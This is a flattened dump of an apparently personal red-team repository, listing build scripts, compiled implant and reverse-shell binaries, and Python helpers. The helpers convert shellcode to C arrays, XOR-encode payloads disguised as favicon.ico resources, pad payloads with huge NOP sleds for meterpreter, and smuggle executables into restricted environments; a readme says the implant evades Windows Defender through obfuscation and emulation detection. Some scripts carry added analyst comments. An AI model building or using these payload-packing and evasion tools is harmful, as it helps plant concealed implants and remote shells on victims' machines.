/Cpp/making_malware/implantv3/x64/Release/implantv3.pdb: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/implantv3/x64/Release/implantv3.pdb -------------------------------------------------------------------------------- /Cpp/making_malware/misc/mm#2/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Cpp/making_malware/misc/readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Cpp/making_malware/revshell/beautify.py: --------------------------------------------------------------------------------
# Copies the file named by argv[1] unchanged to "payload.out" and prints its
# bytes as a C `unsigned char payload[]` initialiser.
# Relies on Python 2 byte-string semantics (ord() over each byte read).
#
# Analyst note: no encoding is applied here. The printed array holds the input
# bytes as-is, so a program compiled with it carries the input verbatim in its
# data, and byte signatures for the input file still apply to that program.
import sys

try:
    plaintext = open(sys.argv[1], "rb").read()
except:
    # Bare except: a missing argument and an unreadable file both land here.
    print("File argument needed! %s " % sys.argv[0])
    sys.exit()


open("payload.out",'wb').write(plaintext)
# Hex values are printed without zero padding (a zero byte prints as 0x0).
print('unsigned char payload[] = { 0x' + ', 0x'.join(hex(ord(x))[2:] for x in plaintext) + ' };')

-------------------------------------------------------------------------------- /Cpp/making_malware/revshell/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /Od /MT /W0 /GS- /DNDEBUG /Tpreverse.cpp /link /OUT:reverse.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 -------------------------------------------------------------------------------- /Cpp/making_malware/revshell/payload.out: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/revshell/payload.out -------------------------------------------------------------------------------- /Cpp/making_malware/revshell/reverse.exe: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/revshell/reverse.exe -------------------------------------------------------------------------------- /Cpp/making_malware/revshell/reverse.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/revshell/reverse.obj -------------------------------------------------------------------------------- /Cpp/making_malware/revshell/reverseDLL.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/revshell/reverseDLL.bin -------------------------------------------------------------------------------- /Cpp/making_malware/revshell/reverseDLL.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/revshell/reverseDLL.txt -------------------------------------------------------------------------------- /Cpp/making_malware/revshell/reverseDLL/Python/ShellcodeRDI.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/revshell/reverseDLL/Python/ShellcodeRDI.pyc -------------------------------------------------------------------------------- /Cpp/making_malware/revshell/reverseDLL/Python/__pycache__/ShellcodeRDI.cpython-311.pyc: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/revshell/reverseDLL/Python/__pycache__/ShellcodeRDI.cpython-311.pyc -------------------------------------------------------------------------------- /Cpp/making_malware/revshell/reverseDLL/Python/__pycache__/ShellcodeRDI.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/revshell/reverseDLL/Python/__pycache__/ShellcodeRDI.cpython-38.pyc -------------------------------------------------------------------------------- /Cpp/making_malware/revshell/reverseDLL/Python/reverseDLL.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/revshell/reverseDLL/Python/reverseDLL.txt -------------------------------------------------------------------------------- /Cpp/making_malware/revshell/reverseDLL/compileDLL.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /W1 /D_USRDLL /D_CRT_SECURE_NO_WARNINGS /D_WINDLL *.cpp /MT /link /DLL /OUT:reverse.dll 4 | echo Cleaning up... 
5 | del *.obj *.lib *.exp -------------------------------------------------------------------------------- /Cpp/making_malware/revshell/reverseDLL/reverse.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/revshell/reverseDLL/reverse.dll -------------------------------------------------------------------------------- /Cpp/making_malware/revshell/reverseDLL/reverseDLL.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/revshell/reverseDLL/reverseDLL.bin -------------------------------------------------------------------------------- /Cpp/making_malware/revshell/reverseEXE.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/revshell/reverseEXE.bin -------------------------------------------------------------------------------- /Cpp/making_malware/revshell/reverseEXE.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/revshell/reverseEXE.txt -------------------------------------------------------------------------------- /Cpp/message_box/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Cpp/message_box/message_box.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int main(){ 5 | 6 | MessageBox(NULL,"My first API call", "Hello 
World!", 0); 7 | return 0; 8 | } -------------------------------------------------------------------------------- /Cpp/message_box/message_box.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/message_box/message_box.exe -------------------------------------------------------------------------------- /Cpp/recursion_off_the_disk/ROTD/ROTD.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/recursion_off_the_disk/ROTD/ROTD.exe -------------------------------------------------------------------------------- /Cpp/recursion_off_the_disk/ROTD/ROTD.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/recursion_off_the_disk/ROTD/ROTD.pdb -------------------------------------------------------------------------------- /Cpp/recursion_off_the_disk/ROTD/ROTD_orig.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/recursion_off_the_disk/ROTD/ROTD_orig.exe -------------------------------------------------------------------------------- /Cpp/recursion_off_the_disk/ROTD/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | rc resources.rc 4 | cvtres /MACHINE:x64 /OUT:resources.o resources.res 5 | cl.exe /nologo /Od /favor:AMD64 /MT /W0 /GS- /DNDEBUG /D_CRT_SECURE_NO_WARNINGS /Tcrotd.cpp /link /OUT:ROTD.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 resources.o -------------------------------------------------------------------------------- 
/Cpp/recursion_off_the_disk/ROTD/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/recursion_off_the_disk/ROTD/favicon.ico -------------------------------------------------------------------------------- /Cpp/recursion_off_the_disk/ROTD/resources.h: -------------------------------------------------------------------------------- 1 | #define FAVICON_ICO 100 2 | -------------------------------------------------------------------------------- /Cpp/recursion_off_the_disk/ROTD/resources.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/recursion_off_the_disk/ROTD/resources.o -------------------------------------------------------------------------------- /Cpp/recursion_off_the_disk/ROTD/resources.rc: -------------------------------------------------------------------------------- 1 | #include "resources.h" 2 | 3 | FAVICON_ICO RCDATA favicon.ico 4 | -------------------------------------------------------------------------------- /Cpp/recursion_off_the_disk/ROTD/resources.res: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/recursion_off_the_disk/ROTD/resources.res -------------------------------------------------------------------------------- /Cpp/recursion_off_the_disk/ROTD/reverse_shell.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/recursion_off_the_disk/ROTD/reverse_shell.bin -------------------------------------------------------------------------------- 
/Cpp/recursion_off_the_disk/ROTD/rotd.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/recursion_off_the_disk/ROTD/rotd.obj -------------------------------------------------------------------------------- /Cpp/recursion_off_the_disk/ROTD/xorencrypt.py: --------------------------------------------------------------------------------
# Red Team Operator course code template
# payload encryption with XOR
#
# author: reenz0h (twitter: @sektor7net)
#
# Reads the file named by argv[1], XORs it with the repeating string KEY,
# writes the result to "favicon.ico" and prints it as a C array initialiser.
# Relies on Python 2 byte-string semantics (ord() over each byte read).
#
# Analyst notes:
#   - KEY is the lowercase alphabet and the transform is deterministic, so
#     the same input always produces the same encoded bytes.
#   - Repeating-key XOR is an encoding rather than encryption: applying the
#     same key again restores the input, and whatever decodes the blob at run
#     time needs the key.
#   - Wherever the input holds a run of zero bytes, the output is the key
#     itself, repeated. That makes the key easy to spot in the encoded blob.
#   - ROTD/resources.rc embeds favicon.ico as RCDATA. A resource that is
#     named like an icon but does not parse as an ICO file is a useful
#     triage signal.

import sys

KEY = "abcdefghijklmnopqrstuvwxyz"

def xor(data, key):
    # Returns `data` XORed byte by byte with `key`, repeating `key` as needed.
    # The result is built as a str, one chr() at a time.

    key = str(key)
    l = len(key)  # not used below; the loop calls len(key) again
    output_str = ""

    for i in range(len(data)):
        current = data[i]
        current_key = key[i % len(key)]
        output_str += chr(ord(current) ^ ord(current_key))

    return output_str

def printCiphertext(ciphertext):
    # Not called in this script; the final print below repeats this expression.
    print('{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };')



try:
    plaintext = open(sys.argv[1], "rb").read()
except:
    # Bare except: a missing argument and an unreadable file both land here.
    print("File argument needed! %s " % sys.argv[0])
    sys.exit()


ciphertext = xor(plaintext, KEY)
# The encoded blob is stored under an icon file name; it is not an ICO image.
open("favicon.ico",'wb').write(ciphertext)
# Hex values are printed without zero padding (a zero byte prints as 0x0).
print('{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };')

-------------------------------------------------------------------------------- /Cpp/recursion_off_the_disk/reverse_shell/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /Od /MT /W0 /GS- /MP /DNDEBUG /Tcreverse_shell.cpp /link /OUT:reverse_shell.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 -------------------------------------------------------------------------------- /Cpp/recursion_off_the_disk/reverse_shell/reverse_shell.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/recursion_off_the_disk/reverse_shell/reverse_shell.exe -------------------------------------------------------------------------------- /Cpp/recursion_off_the_disk/reverse_shell/reverse_shell.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/recursion_off_the_disk/reverse_shell/reverse_shell.obj -------------------------------------------------------------------------------- /Cpp/rsrc_injection/Readme.md: -------------------------------------------------------------------------------- 1 | My custom implementation of Sektor7's RED TEAM Operator: Malware Development Essentials Course 2 | 3 | This code hides the payload in the resource section of my PE file, and uses some simple obfuscation and emulation detection to 4 | bypass the most up to date Windows Defender definitions. 
5 | 6 | More on bypassing Windows Defender Emulations here: 7 | 8 | https://github.com/0xAlexei/Publications/blob/master/Reverse%20Engineering%20Windows%20Defender/Windows%20Binary%20Emulator/BHUSA%20-%20DEFCON%20-%20Alexei-Bulazel-Reverse-Engineering-Windows-Defender-Revision-3.pdf 9 | -------------------------------------------------------------------------------- /Cpp/rsrc_injection/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | rc resources.rc 4 | cvtres /MACHINE:x64 /OUT:resources.o resources.res 5 | cl.exe /nologo /Od /MT /W0 /GS- /DNDEBUG /Tcimplant.cpp /link /OUT:implant.exe /SUBSYSTEM:WINDOWS /MACHINE:x64 resources.o -------------------------------------------------------------------------------- /Cpp/rsrc_injection/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/rsrc_injection/favicon.ico -------------------------------------------------------------------------------- /Cpp/rsrc_injection/implant.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/rsrc_injection/implant.exe -------------------------------------------------------------------------------- /Cpp/rsrc_injection/implant.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/rsrc_injection/implant.obj -------------------------------------------------------------------------------- /Cpp/rsrc_injection/msgbox64.bin: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/rsrc_injection/msgbox64.bin -------------------------------------------------------------------------------- /Cpp/rsrc_injection/resources.h: -------------------------------------------------------------------------------- 1 | #define FAVICON_ICO 100 2 | -------------------------------------------------------------------------------- /Cpp/rsrc_injection/resources.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/rsrc_injection/resources.o -------------------------------------------------------------------------------- /Cpp/rsrc_injection/resources.rc: -------------------------------------------------------------------------------- 1 | #include "resources.h" 2 | 3 | FAVICON_ICO RCDATA favicon.ico 4 | -------------------------------------------------------------------------------- /Cpp/rsrc_injection/resources.res: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/rsrc_injection/resources.res -------------------------------------------------------------------------------- /Cpp/rsrc_injection/xorencrypt.py: -------------------------------------------------------------------------------- 1 | # Red Team Operator course code template 2 | # payload encryption with XOR 3 | # 4 | # author: reenz0h (twitter: @sektor7net) 5 | 6 | import sys 7 | 8 | KEY = "mysecretkeee" 9 | 10 | def xor(data, key): 11 | 12 | key = str(key) 13 | l = len(key) 14 | output_str = "" 15 | 16 | for i in range(len(data)): 17 | current = data[i] 18 | current_key = key[i % len(key)] 19 | output_str += chr(ord(current) ^ ord(current_key)) 20 | 21 | return output_str 22 | 23 | def 
printCiphertext(ciphertext): 24 | print('{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };') 25 | 26 | 27 | 28 | try: 29 | plaintext = open(sys.argv[1], "rb").read() 30 | except: 31 | print("File argument needed! %s " % sys.argv[0]) 32 | sys.exit() 33 | 34 | 35 | ciphertext = xor(plaintext, KEY) 36 | open("favicon.ico",'wb').write(ciphertext) 37 | print('{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };') 38 | -------------------------------------------------------------------------------- /Cpp/rsrc_injection_shell/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | rc resources.rc 4 | cvtres /MACHINE:x64 /OUT:resources.o resources.res 5 | cl.exe /nologo /Od /MT /W0 /GS- /DNDEBUG /Tcimplant.cpp /link /OUT:implant.exe /SUBSYSTEM:WINDOWS /MACHINE:x64 resources.o -------------------------------------------------------------------------------- /Cpp/rsrc_injection_shell/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/rsrc_injection_shell/favicon.ico -------------------------------------------------------------------------------- /Cpp/rsrc_injection_shell/implant.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/rsrc_injection_shell/implant.exe -------------------------------------------------------------------------------- /Cpp/rsrc_injection_shell/implant.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/rsrc_injection_shell/implant.obj -------------------------------------------------------------------------------- 
/Cpp/rsrc_injection_shell/implant_noemul.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/rsrc_injection_shell/implant_noemul.exe -------------------------------------------------------------------------------- /Cpp/rsrc_injection_shell/resources.h: -------------------------------------------------------------------------------- 1 | #define FAVICON_ICO 100 2 | -------------------------------------------------------------------------------- /Cpp/rsrc_injection_shell/resources.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/rsrc_injection_shell/resources.o -------------------------------------------------------------------------------- /Cpp/rsrc_injection_shell/resources.rc: -------------------------------------------------------------------------------- 1 | #include "resources.h" 2 | 3 | FAVICON_ICO RCDATA favicon.ico 4 | -------------------------------------------------------------------------------- /Cpp/rsrc_injection_shell/resources.res: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/rsrc_injection_shell/resources.res -------------------------------------------------------------------------------- /Cpp/rsrc_injection_shell/reverse_shell/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /Od /MT /W0 /GS- /MP /DNDEBUG /Tcreverse_shell.cpp /link /OUT:reverse_shell.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 -------------------------------------------------------------------------------- /Cpp/rsrc_injection_shell/reverse_shell/reverse_shell.exe: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/rsrc_injection_shell/reverse_shell/reverse_shell.exe -------------------------------------------------------------------------------- /Cpp/rsrc_injection_shell/reverse_shell/reverse_shell.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/rsrc_injection_shell/reverse_shell/reverse_shell.obj -------------------------------------------------------------------------------- /Cpp/rsrc_injection_shell/reverse_shell/shell.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/rsrc_injection_shell/reverse_shell/shell.bin -------------------------------------------------------------------------------- /Cpp/rsrc_injection_shell/shell.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/rsrc_injection_shell/shell.bin -------------------------------------------------------------------------------- /Cpp/rsrc_injection_shell/xorencrypt.py: -------------------------------------------------------------------------------- 1 | # Red Team Operator course code template 2 | # payload encryption with XOR 3 | # 4 | # author: reenz0h (twitter: @sektor7net) 5 | 6 | import sys 7 | 8 | KEY = "mysecretkeee" 9 | 10 | def xor(data, key): 11 | 12 | key = str(key) 13 | l = len(key) 14 | output_str = "" 15 | 16 | for i in range(len(data)): 17 | current = data[i] 18 | current_key = key[i % len(key)] 19 | output_str += chr(ord(current) ^ ord(current_key)) 20 | 21 | return 
output_str 22 | 23 | def printCiphertext(ciphertext): 24 | print('{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };') 25 | 26 | 27 | 28 | try: 29 | plaintext = open(sys.argv[1], "rb").read() 30 | except: 31 | print("File argument needed! %s " % sys.argv[0]) 32 | sys.exit() 33 | 34 | 35 | ciphertext = xor(plaintext, KEY) 36 | open("favicon.ico",'wb').write(ciphertext) 37 | print('{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };') 38 | -------------------------------------------------------------------------------- /Powershell/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Presentations/.placeholder: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Presentations/Building Skynet_as_submitted.pptx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Presentations/Building Skynet_as_submitted.pptx -------------------------------------------------------------------------------- /Python/PushingP/pushingpayloads.py: -------------------------------------------------------------------------------- 1 | import sys 2 | # by 0xTriboulet 3 | # Short python script that takes a raw binary payload 4 | # and build a (big) nop sled over that payload 5 | # put this large payload into your program and compile with: 6 | # /STACK:3000000 7 | try: 8 | plaintext = open(sys.argv[1], "rb").read() 9 | except: 10 | print("File argument needed! 
%s " % sys.argv[0]) 11 | print("python2 pushingpayloads.py meterpreter_stageless.bin > out.txt") 12 | sys.exit() 13 | 14 | print('unsigned char payload[] = { '+'0x90, '*2048000 + '0x' + ', 0x'.join(hex(ord(x))[2:] for x in plaintext) + ' };') -------------------------------------------------------------------------------- /Python/PushingP/pushingpayloadsv3.py: -------------------------------------------------------------------------------- 1 | import sys 2 | # by 0xTriboulet 3 | # Short python script that takes a raw binary payload 4 | # and build a (big) nop sled over that payload 5 | # put this large payload into your program and compile with: 6 | # /STACK:3000000 7 | # PYTHON3 8 | try: 9 | plaintext = open(sys.argv[1], "rb").read() 10 | except: 11 | print("File argument needed! %s " % sys.argv[0]) 12 | print("python3 pushingpayloadsv3.py meterpreter_stageless.bin > out.txt") 13 | sys.exit() 14 | 15 | print('unsigned char payload[] = { '+'0x90, '*2048000 + '0x' + ', '.join(str(hex(x)) for x in plaintext) + ' };') -------------------------------------------------------------------------------- /Python/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Python/smuggler/OUT/test.txt: -------------------------------------------------------------------------------- 1 | TEST 2 | -------------------------------------------------------------------------------- /Python/smuggler/Readme.md: -------------------------------------------------------------------------------- 1 | Short python script that converts any file into a base64 encoded zip file stored in out.txt. You can then copy the script and the contents of out.txt into a .py and an in.txt file (respectively) on the target environment and run the script again. This methodology allows you to transfer executables into environments that otherwise do not allow file transfers. 
2 | 3 | 4 | [12/4/2022] Added -x option allowing the ability to xor your smuggled files 5 | 6 | ![image](https://user-images.githubusercontent.com/22229087/205515548-cd16a267-72e2-4079-828e-cc05bcb93a9b.png) 7 | 8 | 9 | XORing remains optional though 10 | 11 | ![image](https://user-images.githubusercontent.com/22229087/205515977-d51013ef-0972-4ad1-8b15-faec22db0dde.png) 12 | -------------------------------------------------------------------------------- /Python/smuggler/in.txt: -------------------------------------------------------------------------------- 1 | UEsDBBQAAAAAAN16gVW+14P3BQAAAAUAAAAIAAAAdGVzdC50eHRURVNUClBLAQIUAxQAAAAAAN16gVW+14P3BQAAAAUAAAAIAAAAAAAAAAAAAAC0gQAAAAB0ZXN0LnR4dFBLBQYAAAAAAQABADYAAAArAAAAAAA= -------------------------------------------------------------------------------- /Python/smuggler/out.txt: -------------------------------------------------------------------------------- 1 | UEsDBBQAAAAAAN16gVW+14P3BQAAAAUAAAAIAAAAdGVzdC50eHRURVNUClBLAQIUAxQAAAAAAN16gVW+14P3BQAAAAUAAAAIAAAAAAAAAAAAAAC0gQAAAAB0ZXN0LnR4dFBLBQYAAAAAAQABADYAAAArAAAAAAA= -------------------------------------------------------------------------------- /Python/smuggler/test.txt: -------------------------------------------------------------------------------- 1 | TEST 2 | -------------------------------------------------------------------------------- /Python/utilities/Readme.md: -------------------------------------------------------------------------------- 1 | A collection of useful python scripts. Some of these have been modified from their original versions, but credit is given as much as possible to the original authors. 2 | 3 | -------------------------------------------------------------------------------- /Python/utilities/beautify.py: -------------------------------------------------------------------------------- 1 | import sys 2 | 3 | try: 4 | plaintext = open(sys.argv[1], "rb").read() 5 | except: 6 | print("File argument needed! 
%s " % sys.argv[0]) 7 | sys.exit() 8 | 9 | 10 | open("payload.out",'wb').write(plaintext) 11 | print('unsigned char payload[] = { 0x' + ', 0x'.join(hex(ord(x))[2:] for x in plaintext) + ' };') -------------------------------------------------------------------------------- /Python/utilities/xorencrypt.py: -------------------------------------------------------------------------------- 1 | # Red Team Operator course code template 2 | # payload encryption with XOR 3 | # 4 | # author: reenz0h (twitter: @sektor7net) 5 | 6 | import sys 7 | 8 | KEY = "WindowsSystem32" 9 | 10 | def xor(data, key): 11 | 12 | key = str(key) 13 | l = len(key) 14 | output_str = "" 15 | 16 | for i in range(len(data)): 17 | current = data[i] 18 | current_key = key[i % len(key)] 19 | output_str += chr(ord(current) ^ ord(current_key)) 20 | 21 | return output_str 22 | 23 | def printCiphertext(ciphertext): 24 | print('{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };') 25 | 26 | 27 | 28 | try: 29 | plaintext = open(sys.argv[1], "rb").read() 30 | except: 31 | print("File argument needed! %s " % sys.argv[0]) 32 | sys.exit() 33 | 34 | 35 | ciphertext = xor(plaintext, KEY) 36 | #open("payload.out",'wb').write(ciphertext) 37 | print('unsigned char payload[] = { 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };') 38 | -------------------------------------------------------------------------------- /Readme.md: -------------------------------------------------------------------------------- 1 | A disorganized repository of code snippets that I have found useful in getting the hang of new languages in the context of Red Team operations. 2 | 3 | Some of this code will be referenced in other products and is retained here for ease of access. 
4 | -------------------------------------------------------------------------------- /Rust/CreateProcessA/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "peruns_fart" 3 | version = "0.1.0" 4 | edition = "2021" 5 | 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | 8 | [dependencies] 9 | sys = "0.0.0" 10 | winapi = {version = "0.3.9", features=[ 11 | "winnt", 12 | "memoryapi", 13 | "errhandlingapi", 14 | "processthreadsapi", 15 | "synchapi", 16 | "winbase", 17 | "handleapi", 18 | "libloaderapi", 19 | "minwinbase", 20 | "heapapi" 21 | ]} 22 | windows = { version = "*", features = [ 23 | "Win32_System_Threading", 24 | "Win32_Foundation", 25 | "Win32_System_Memory", 26 | "Win32_Security" 27 | ] } 28 | windows-sys = { version = "*", features = [ 29 | "Win32_System_Threading", 30 | "Win32_Foundation", 31 | "Win32_System_Memory" 32 | ] } 33 | 34 | 35 | -------------------------------------------------------------------------------- /Rust/CreateProcessA/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Rust/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Rust/peruns_fart/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "peruns_fart" 3 | version = "0.1.0" 4 | edition = "2021" 5 | 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | 8 | [dependencies] 9 | libc = "0.2.139" 10 | sys = "0.0.0" 11 | 12 | 13 | windows-sys = { version = "*", features = [ 14 | "Win32_Security", 15 | "Win32_Foundation", 16 | "Win32_System_Kernel", 17 | "Win32_System_Memory", 18 | 
"Win32_System_Threading", 19 | "Win32_System_LibraryLoader", 20 | "Win32_System_SystemServices", 21 | "Win32_System_SystemInformation", 22 | "Win32_System_Diagnostics_Debug", 23 | "Win32_System_WindowsProgramming", 24 | 25 | 26 | ] } 27 | 28 | 29 | -------------------------------------------------------------------------------- /Rust/peruns_fart/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Rust/rust_implantv1/implant_rust.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Rust/rust_implantv1/implant_rust.exe -------------------------------------------------------------------------------- /Rust/rust_implantv2/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "rusty_implant" 3 | version = "0.1.0" 4 | edition = "2021" 5 | 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | 8 | [dependencies] 9 | libc = "0.2.139" 10 | region = "3.0.0" 11 | -------------------------------------------------------------------------------- /Rust/rust_implantv2/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Rust/rust_implantv2/rusty_implant.exe: -------------------------------------------------------------------------------- 